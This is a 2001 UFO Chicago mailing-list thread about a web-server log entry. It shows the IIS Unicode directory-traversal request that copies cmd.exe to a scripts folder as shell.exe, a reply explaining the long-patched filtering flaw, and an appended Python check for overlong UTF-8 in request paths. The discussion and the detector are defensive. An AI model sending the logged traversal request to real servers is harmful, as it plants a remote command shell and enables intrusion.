[UFO Chicago] New Attack Against MS Webservers?
Brian McGroarty
bvmcg@yahoo.com
Thu, 13 Sep 2001 07:05:44 -0700 (PDT)
Old - that's been patched.

IIS had a hole where Unicode could be used to get periods and
slashes into a URL. The filters which should have prohibited
this weren't Unicode savvy, so IIS permitted execution of
anything as a script.

By the by - any reason the list isn't in a "reply-to:" - ?

--- Nate Riffe <inkblot@geocities.com> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> I just got the email below from my 404.php script. Does anyone know
> whether this is another exploit of an already known bug or a new bug?
>
> - -Nate
>
> - ------------------------------------------------((\))<----------------------
> Nate Riffe | PGP public key available at:
> http://www.movealong.org/ | http://www.movealong.org/~inkblot/pgp-key.asc
> inkblot@geocities.com |
> | Secure your email today!
>
> - ---------- Forwarded message ----------
> Date: Thu, 13 Sep 2001 08:39:33 -0500 (CDT)
> From: www-data <www-data@movealong.dhs.org>
> To: inkblot@maverick.inknet
> Subject: 404 Not Found at /scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\shell.exe
>
> Hi Nate,
>
> Hey, this is your 404.php script. 4.3.18.212 found a page that doesn't
> exist at
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\shell.exe.
> What a conundrum!
>
> Regards,
> 404.php
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGPfreeware 5.0i for non-commercial use
> Charset: noconv
>
> iQA/AwUBO6C4W4jJNqeHAZR4EQJ+vACg3R0kIkPvFh3qLXy6M4pvp0JCgrMAoMNK
> M2FnEfTp3HF7UVsBGI4kpXMR
> =ZpEC
> -----END PGP SIGNATURE-----
>
>
> _______________________________________________
> UFO Chicago -- Users of Free Operating Systems
> Free Software Rules -- Proprietary Drools!
> http://ufo.chicago.il.us/cgi-bin/mailman/listinfo/ufo
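
The filtering gap described in the reply above, as an added example that is not part of the original thread: a Python check that finds overlong UTF-8 sequences in a request path and compares a byte-level `..` test with the same test after lenient decoding. The function names and the second sample path are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed samples: the path portion of the request quoted above (query
# string omitted) and a benign path containing a correctly encoded "é".
SAMPLE_PATHS = ["/scripts/..%c0%af../winnt/system32/cmd.exe", "/docs/caf%c3%a9.html"]

# (lead mask, lead pattern, continuation bytes, smallest code point that
# legitimately needs a sequence of this length)
UTF8_FORMS = [(0xE0, 0xC0, 1, 0x80), (0xF0, 0xE0, 2, 0x800), (0xF8, 0xF0, 3, 0x10000)]

def overlong_sequences(data: bytes):
    """Return (offset, raw bytes, decoded char) for every overlong UTF-8 sequence."""
    hits, i = [], 0
    while i < len(data):
        for mask, lead, extra, minimum in UTF8_FORMS:
            tail = data[i + 1:i + 1 + extra]
            if ((data[i] & mask) == lead and len(tail) == extra
                    and all((t & 0xC0) == 0x80 for t in tail)):
                cp = data[i] & (~mask & 0xFF)
                for t in tail:
                    cp = (cp << 6) | (t & 0x3F)
                if cp < minimum:  # encoded with more bytes than necessary
                    hits.append((i, data[i:i + 1 + extra], chr(cp)))
                i += extra
                break
        i += 1
    return hits

def has_dotdot(data: bytes) -> bool:
    """True if any path segment is exactly '..' (either slash style)."""
    return b".." in re.split(rb"[/\\]", data)

def inspect_request(raw_path: str) -> dict:
    data = unquote_to_bytes(raw_path.split("?", 1)[0])
    hits = overlong_sequences(data)
    lenient = data
    for _, seq, ch in hits:  # what a decoder that accepts overlong forms sees
        lenient = lenient.replace(seq, ch.encode("utf-8", "surrogatepass"))
    return {"overlong": hits,
            "byte_level_traversal": has_dotdot(data),
            "decoded_traversal": has_dotdot(lenient)}

if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(p, inspect_request(p))
```

Valid UTF-8 never contains overlong forms, so a request path that yields any hit can be rejected outright instead of being normalized.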